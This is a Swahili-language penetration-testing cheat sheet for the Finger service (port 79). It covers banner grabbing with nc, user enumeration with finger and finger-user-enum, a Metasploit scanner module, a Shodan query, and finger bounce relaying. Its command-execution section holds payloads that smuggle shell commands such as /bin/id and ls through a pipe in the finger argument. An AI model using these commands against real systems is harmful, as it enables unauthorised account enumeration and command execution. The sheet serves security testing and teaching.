Basic Info

Programu/huduma ya Finger inatumika kwa kupata maelezo kuhusu watumiaji wa kompyuta. Kawaida, taarifa zinazotolewa zinajumuisha jina la kuingia la mtumiaji, jina kamili, na, katika baadhi ya matukio, maelezo ya ziada. Maelezo haya ya ziada yanaweza kujumuisha eneo la ofisi na nambari ya simu (ikiwa inapatikana), wakati mtumiaji alipoingia, kipindi cha kutokuwa na shughuli (wakati wa kupumzika), tukio la mwisho ambapo barua pepe ilisomwa na mtumiaji, na maudhui ya mipango na faili za mradi za mtumiaji.

Default port: 79

PORT   STATE SERVICE
79/tcp open  finger

Uhesabu

Kuchukua Bango/Kuunganisha Msingi

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Uainishaji wa watumiaji

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Mbadala unaweza kutumia finger-user-enum kutoka pentestmonkey, baadhi ya mifano:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap tekeleza script kwa kutumia scripts za default

Metasploit inatumia hila zaidi kuliko Nmap

use auxiliary/scanner/finger/finger_users

Shodan

• port:79 USER

Utekelezaji wa amri

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Tumia mfumo kama relay ya finger

finger user@host@victim
finger @internal@external